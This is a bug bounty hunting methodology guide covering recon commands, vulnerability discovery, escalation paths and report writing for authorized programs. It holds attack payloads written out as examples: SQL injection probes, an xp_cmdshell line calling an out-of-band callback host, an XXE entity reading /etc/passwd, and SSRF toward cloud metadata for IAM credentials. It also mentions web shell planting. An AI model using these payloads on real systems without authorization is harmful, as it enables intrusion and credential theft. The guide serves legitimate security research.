# Bug Bounty Methodology

A complete, target-agnostic workflow for finding, proving, and reporting vulnerabilities.

---

## Table of Contents

1. [Before You Start a Session](#1-before-you-start-a-session)
2. [Phase 1 — Recon](#2-phase-1--recon)
3. [Phase 2 — Mapping](#3-phase-2--mapping)
4. [Phase 3 — Vulnerability Discovery](#4-phase-3--vulnerability-discovery)
5. [Phase 4 — Exploitation and Escalation](#5-phase-4--exploitation-and-escalation)
6. [Phase 5 — Validate and Report](#6-phase-5--validate-and-report)
7. [Timing Rules](#7-timing-rules)
8. [Session End Protocol](#8-session-end-protocol)
9. [Program Selection Criteria](#9-program-selection-criteria)
10. [Tool Stack by Phase](#10-tool-stack-by-phase)

---

## 1. Before You Start a Session

Answer all three questions before touching any tool.

**Define:** "Today I target [feature / subdomain / vuln class] to achieve [C / I / A / ATO / RCE]"  
**Select:** Pick exactly one or two vuln classes. Write them down.  
**Execute:** Work only those vuln classes this session.

Hunting without a defined goal produces zero findings. The goal focuses your observation — you notice different things when looking for IDOR than when looking for XSS.

### Wide vs Deep Decision

Start wide when the program is new or the scope recently expanded.  
Go deep when you have already mapped the surface and have a specific hypothesis.

| Signal | Do Wide | Do Deep |
|---|---|---|
| First day on program | X | |
| Wildcard scope `*.target.com` | X | |
| Scope update (new subdomain added) | X | |
| You have a specific endpoint that "feels wrong" | | X |
| You've been on the program for 3+ days | | X |
| You found one bug and want siblings | | X |

---

## 2. Phase 1 — Recon

**Goal:** Maximize attack surface before a single payload is sent.

### Subdomain Enumeration

Passive first (no detection risk), then active DNS resolution, then HTTP probing.

```bash
# Passive — queries CT logs, APIs, crawlers
subfinder -d target.com -silent -o subs_passive.txt

# Certificate Transparency — often finds internal subdomains
curl -s "https://crt.sh/?q=%.target.com&output=json" \
  | jq -r '.[].name_value' | sort -u > subs_crt.txt

# Combine and deduplicate
cat subs_passive.txt subs_crt.txt | sort -u > subs_all.txt

# Resolve DNS — eliminate non-existent hosts
puredns resolve subs_all.txt -r resolvers.txt -w subs_resolved.txt

# HTTP probe — get status codes, titles, tech stack
httpx -l subs_resolved.txt -sc -title -tech-detect -o live_hosts.txt
```

### URL and Endpoint Discovery

```bash
# Archive sources — finds old endpoints that still exist
gau target.com | uro > urls_archive.txt
waymore -i target.com -mode U > urls_waymore.txt

# Active crawl — follows JS, renders SPAs
katana -u https://target.com -jc -o urls_crawl.txt

# Combine
cat urls_archive.txt urls_waymore.txt urls_crawl.txt | uro | sort -u > urls_all.txt
```

### JS Analysis

```bash
# Download all JS files from the live app
# (intercept in Burp or use katana's JS file output)

# Extract endpoints and secrets
jsluice urls < bundle.js | sort -u
trufflehog filesystem ./js_files/ --only-verified

# Search for config keys manually
grep -E "(client_id|api_key|secret|token|password|endpoint|host)" bundle.js
```

### CSP Header Harvesting

CSP `connect-src` lists every backend the SPA talks to — including internal hostnames not in DNS enumeration results.

```bash
for host in $(cat live_hosts.txt | awk '{print $1}'); do
    echo "=== $host ===" && curl -sI "https://$host" | grep -i content-security-policy
done
```

### Config File Enumeration

Modern SPAs load runtime config from a separate file that is always publicly accessible. Check these paths against every live subdomain:

```
/assets/app-constants.js
/configs/app-constants.js
/config/app-constants.js
/env.js
/config.json
/app-constants.js
/static/config.js
/public/config.json
/assets/config.json
```

---

## 3. Phase 2 — Mapping

**Goal:** Understand the application like its developer does.

### Authentication Model

Identify what auth mechanism is in use before testing anything:

| Signal | Auth type | What to test |
|---|---|---|
| `Authorization: Bearer eyJ...` (JWT) | JWT / OAuth | Algorithm confusion, `alg:none`, weak secret |
| `Cookie: session=...` (opaque) | Session cookie | Fixation, missing Secure/HttpOnly, CSRF |
| `Cookie: ...` (JWT in cookie) | JWT via cookie | Same as JWT + SameSite misconfiguration |
| `client_id` + `tenant_id` in config | Azure AD / Okta OIDC | Device code, ROPC, scope escalation |
| SAML POST to `/saml/acs` | SAML | Signature wrapping, XML injection |
| API key in header | Static API key | Key in JS source, rotation issues |

### Business Logic Mapping

Find the flows that matter most to the business — these are the flows where bugs have the highest impact.

High-value flows:
- Account creation and email verification
- Password reset
- Payment and checkout
- Data export or bulk download
- Role assignment or privilege escalation
- OAuth authorization
- File upload

For each flow, map it completely in Burp before testing. A flow you don't understand fully cannot be tested for logic flaws.

### Role and Permission Inventory

Create an account at each role level the application supports. Test every request at every role level. Don't assume access control is consistent.

### Anomaly Detection

While mapping, flag anything that looks different from the rest of the application:

- An endpoint that names fields differently (`userId` everywhere, but `user_id` here)
- A response that takes significantly longer than similar requests
- An error message that exposes a different tech stack than the rest of the app
- A parameter that is present in the request but not used in the response
- An endpoint that returns HTTP 200 for requests that should fail

Anomalies point to different developers, different code paths, or different security assumptions — all of which increase the probability of finding a bug.

---

## 4. Phase 3 — Vulnerability Discovery

**Goal:** Find the bug. Work from your session goal. Use the decision tree below.

### Input Classification Decision Tree

```
What type of input are you testing?
│
├── ID / reference (user_id, order_id, uuid)
│   └── IDOR: horizontal and vertical access control
│
├── Search / filter / sort parameter
│   └── SQLi, NoSQLi, GraphQL injection
│
├── URL / webhook / callback / PDF generator input
│   └── SSRF
│
├── Text reflected in the HTML response
│   └── XSS: reflected, stored, DOM
│
├── File upload
│   └── SVG XSS, web shell, path traversal, polyglot files
│
├── Price / quantity / coupon / discount
│   └── Business logic, race conditions, integer overflow
│
├── Login / 2FA / password reset flow
│   └── Auth bypass, rate limit bypass, token prediction
│
├── Object creation with many fields
│   └── Mass assignment
│
├── Template / wiki / markdown editor
│   └── SSTI, SSRF via template rendering
│
└── Nothing obvious
    └── Fuzz with ffuf + smart wordlist, then error-based probing
```

### Error-Based vs Blind Detection

Always try error-based first — it is faster and produces better evidence.

**Step 1 — Error-based probes:**
```
'   "   {{7*7}}   ${7*7}}   <script>   ../../../
```
Watch for: HTTP 500, stack traces, changed response body, different error message than usual.

**Step 2 — Time-based (if no error):**
```sql
'; WAITFOR DELAY '0:0:5'--    (MSSQL)
'; SELECT SLEEP(5)--          (MySQL)
```
Watch for: response time > 5 seconds.

**Step 3 — OOB (if no time diff):**
```bash
# Start interactsh listener
interactsh-client

# Use the generated hostname in your payload
'; exec master..xp_cmdshell 'nslookup <interactsh_host>'--
```
Watch for: DNS callback in interactsh output.

**Step 4 — Boolean (if no OOB):**
Send two requests — one that should return true and one that should return false. Compare response body or Content-Length. A consistent difference confirms a boolean injection point.

---

## 5. Phase 4 — Exploitation and Escalation

**Goal:** Prove maximum business impact. Turn findings into payouts.

### Escalation Decision Tree

**XSS found:**
- Can you steal a session cookie? → Session hijack → ATO
- Cookie is HttpOnly? → Force email change via XHR, keep the attacker's email → ATO
- Self-XSS only? → Find a CSRF or postMessage vector to trigger it on another user

**IDOR found:**
- Read access to PII? → Automate to show scale (how many users affected)
- Write access to email or password field? → Direct ATO
- UUID-only IDs? → Find a UUID leak in another endpoint (logs, search results, email headers), then retry

**SSRF found:**
- DNS callback only? → Do NOT report yet. Try to reach `169.254.169.254` (AWS metadata), `100.100.100.200` (Alibaba), `metadata.google.internal`
- Metadata reachable? → Extract IAM credentials → Lateral movement or RCE
- Internal port scan? → Find Redis (6379), Kubernetes API (8443), Elasticsearch (9200) → RCE or data exfil

**Open redirect found:**
- Is it used as an OAuth callback? → Try to redirect the authorization code to your server
- Does `javascript:` scheme work? → XSS
- Neither? → Low severity, note for chaining

**SQLi found:**
- Error-based? → Extract data: passwords, tokens, PII
- `INTO OUTFILE` available? → Write web shell → RCE
- Blind? → Boolean extraction, then time-based extraction for sensitive data

### Minimizing Prerequisites

After proving impact, reduce the attack prerequisites. Every prerequisite you remove increases severity.

- Does the attack require an authenticated account? → Test unauthenticated
- Does it require a victim to click a link? → Test if it works without interaction
- Does it require specific timing? → Test if it works at any time
- Does it require a specific role? → Test if the lowest role can trigger it

### Chaining Low-Severity Findings

Low-severity findings are only low-severity in isolation. When combined, they can reach Critical.

| Finding A | + Finding B | = Escalated Impact |
|---|---|---|
| Open redirect | + OAuth code in redirect | = ATO |
| Self-XSS | + CSRF to trigger XSS | = Stored XSS on victim |
| SSRF (DNS only) | + Internal service with no auth | = Data exfiltration |
| Username enumeration | + No rate limit on login | = Credential stuffing |
| Exposed client_id | + Device code flow enabled | = Phishing-enabled ATO |
| IDOR (read only) | + Leaked UUID from logs | = Data exfiltration at scale |

---

## 6. Phase 5 — Validate and Report

### The 7-Question Gate

Answer all 7 before writing a report. If any answer is no, fix the finding or drop it.

1. **Can I reproduce it?** Run the PoC twice from a clean session.
2. **Is it in scope?** Check the program's scope page explicitly.
3. **Is it a known/intended behavior?** Check the docs; test if it's actually a design choice.
4. **Is the impact real, not theoretical?** Describe what the attacker actually obtains or does.
5. **Am I the first?** Check the program's disclosed reports; search for known CVEs on the component.
6. **Can I minimize prerequisites?** Fewest clicks, fewest accounts, fewest setup steps.
7. **Do I have clean HTTP evidence?** Raw requests and responses ready to paste.

### Report Structure

**Title:**
```
[Bug class] in [endpoint/feature] allows [attacker role] to [impact]
```

Good title: `IDOR in /api/v1/invoices/{id} allows unauthenticated user to download any customer invoice`  
Bad title: `Missing access control on invoice endpoint`

**Summary (2–3 sentences):**
- Sentence 1: What the attacker can do
- Sentence 2: How (the mechanism)
- Sentence 3: Business impact (data type, scale, or system affected)

**Steps to Reproduce:**
Numbered. Every step is a single action. Include exact HTTP requests and responses. Do not include theory or explanation — only what you did.

**Impact section:**
Separate from the summary. Quantify. "Affects all registered users" beats "affects users." Name the data type (PII, financial, credentials) and what an attacker would do with it.

**Proof of Concept:**
Working commands or code. Actual server responses. If a screenshot, also include the raw request/response text.

**Remediation:**
One to two sentences. Name the fix category, not the implementation. "Enforce server-side ownership check before returning invoice data" — not a code snippet.

**CVSS 3.1:**
Include a vector string. Estimate if unsure and note it. Triagers will adjust, but an estimate shows you understand severity.

---

## 7. Timing Rules

These rules prevent the three biggest time-wasters in bug bounty: rabbit holes, random wandering, and program-hopping.

### The 20-Minute Rotation Rule

Every 20 minutes, ask: "Am I making progress?"  
- If yes (new data, partial confirmation, new lead): continue  
- If no (same error, no new information): rotate to the next endpoint, subdomain, or vuln class

Progress means new information. Getting the same 403 five different ways is not progress.

### The 45-Minute Hard Stop

If you have been on a single parameter for 45 minutes with no progress, stop. Add it to your notes as a blocked lead. Move on. Return to it in a future session with fresh eyes or after you have more context from other parts of the app.

### The 2-Week / 30-Hour Program Rule

Stay on a program for a minimum of two weeks or 30 hours before switching. The first hours are always less productive — you are learning the app. The insights come once you understand how it was built.

### After Finding a Bug: The 20-Minute A→B Sprint

Immediately after confirming a bug, spend 20 minutes looking for siblings using the A→B signal:
- Same endpoint pattern (replace resource name, try all HTTP methods)
- Same auth check (or lack of) across related endpoints
- Same config pattern across other subdomains or apps

If nothing found in 20 minutes, continue with your planned session.

---

## 8. Session End Protocol

Run this every time you stop hunting, even for short sessions.

- [ ] Update your findings table: ID, description, severity, status
- [ ] Move tested leads to the dead ends list with the reason they failed
- [ ] Record any new subdomains or attack surface discovered
- [ ] Write one sentence for anything "weird but not exploitable" — these become gadgets later
- [ ] Save Burp/Caido project file

The dead ends list is as valuable as the findings list. It prevents re-testing the same things in future sessions.

---

## 9. Program Selection Criteria

Not all programs are worth hunting. Use these filters before committing.

### Green Flags

- Wildcard scope (`*.target.com`) — more surface to find unique bugs
- Payout history in disclosed reports — indicates the program pays, not just "reputation points"
- Fast triage (< 7 days average) — good programs listed on HackerOne and Bugcrowd show response time stats
- Technical product — more attack surface than a marketing site
- New program or recent scope update — other hunters haven't exhausted it yet
- Disclosed reports show variety — program accepts different bug types

### Red Flags

- Scope limited to one subdomain with no wildcard
- "No monetary reward" or reward caps at < $500 for Critical
- VDP (Vulnerability Disclosure Program) with no bounty — fine for building reputation, bad for income
- Very old program with thousands of researchers — high duplication rate
- Program notes say "issues must have a critical business impact" — low tolerance threshold
- Public reports show N/A rate > 20% — triagers are trigger-happy

### How to Read Disclosed Reports Before Hunting

Before hunting a new program, read 10–20 disclosed reports. You are looking for:
1. **What bug types are accepted?** (Some programs won't accept rate limit issues or open redirects)
2. **What is the triage quality?** (Do they understand the bugs? Are severities reasonable?)
3. **What has already been found?** (Don't test what's already been found and fixed)
4. **What tech stack does the app use?** (From the report details, not just the program page)
5. **What did researchers test that did NOT work?** (Look for comment threads showing dead ends)

---

## 10. Tool Stack by Phase

### Phase 1 — Recon

| Task | Tool | Notes |
|---|---|---|
| Subdomain enumeration | `subfinder` | Passive; queries many sources |
| Certificate Transparency | `crt.sh` API | Finds internal subdomains |
| DNS resolution | `puredns` | Fast; use a public resolver list |
| HTTP probing | `httpx` | Status codes, titles, tech stack |
| URL discovery (archive) | `gau` + `waymore` | Old endpoints that still exist |
| URL discovery (active) | `katana` | Follows JS rendering |
| URL deduplication | `uro` | Removes parameter variants |
| Port scanning | `naabu` → `rustscan` | Wide sweep first, then deep |
| Nuclei scanning | `nuclei -tags cve,takeover` | Known CVEs first |

### Phase 2 — Mapping

| Task | Tool | Notes |
|---|---|---|
| Proxy + sitemap | Burp Suite / Caido | All manual traffic through here |
| JS analysis | `jsluice` | URL and secret extraction |
| Secret verification | `trufflehog --only-verified` | Only confirmed working keys |
| Parameter discovery | `arjun` + `paramspider` | Hidden params in JSON and form bodies |
| WAF detection | `wafw00f` | Identifies WAF vendor |
| Tech fingerprint | `httpx -tech-detect` | Framework and server detection |

### Phase 3 — Discovery

| Task | Tool | Notes |
|---|---|---|
| Directory fuzzing | `ffuf -ac` | Auto-calibrate removes false positives |
| XSS filtering | `kxss` → `dalfox` | Find reflections first, then scan |
| SQLi | `ghauri` | Modern; handles blind and WAF bypass |
| SSRF OOB | `interactsh-client` | Self-hosted; no third-party DNS dependency |
| Subdomain takeover | `subzy` | Checks against 70+ vulnerable services |
| 403 bypass | `byp4xx` | 20+ bypass techniques automated |
| Cloud storage | `s3scanner` | Checks bucket permissions |

### Phase 4 — Exploitation

| Task | Tool | Notes |
|---|---|---|
| HTTP requests | `curl` / Burp Repeater | Exact control over headers and body |
| JWT attacks | `jwt_tool` | Algorithm confusion, `alg:none`, secret brute force |
| OAuth analysis | Manual + Burp | No good automated tool; must be manual |
| Race conditions | Turbo Intruder | Last-byte sync technique |
| SSRF to metadata | Manual | Target-specific; no tool replaces judgment |

---

## Attack Surface Cheat Sheet by Tech Stack

### Angular App
- Check `/assets/app-constants.js`, `/configs/app-constants.js`, `/config/app-constants.js`
- Extract `client_id`, `tenant_id`, API hostnames, WebSocket URLs
- If Azure AD: test device code grant, ROPC
- If Okta: test PKCE bypass, token exchange

### React App (Create React App)
- Env vars compiled into bundle (`REACT_APP_*`)
- Check `window.__ENV` or `window.appConfig` in HTML source
- Source map exposure: try `bundle.js.map`

### Next.js App
- `/_next/static/chunks/` — look for config objects, API routes
- `/api/*` — Next.js API routes often have weaker auth than the main SPA
- Server Actions: CSRF via `Origin: null` bypass
- Image optimization: SSRF via `/_next/image?url=<attacker_controlled>`

### Ruby on Rails App
- `/rails/info/routes` in development mode
- Mass assignment: add `admin=true` to any POST body
- Insecure deserialization via `Marshal.load`

### Django App
- `/admin/` — check if Django admin panel is exposed
- `DEBUG=True`: detailed error page with local variables, settings
- `/api/` — Django REST Framework browsable API is often left enabled in staging
- IDOR on integer PKs (Django uses integer primary keys by default)

### GraphQL Endpoint
- `POST /graphql` with `{"query":"{__schema{types{name}}}"}` — introspection check
- Batching attacks: send 100 mutations in one request
- IDOR: replace ID in query with another user's ID
- Field suggestions: send a typo, error response suggests real field names

### SOAP / Legacy XML API
- XXE: inject `<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>`
- SSRF via XXE: use `SYSTEM "http://internal-host:port/"`
- Schema disclosure: `?wsdl` often returns the full WSDL definition unauthenticated
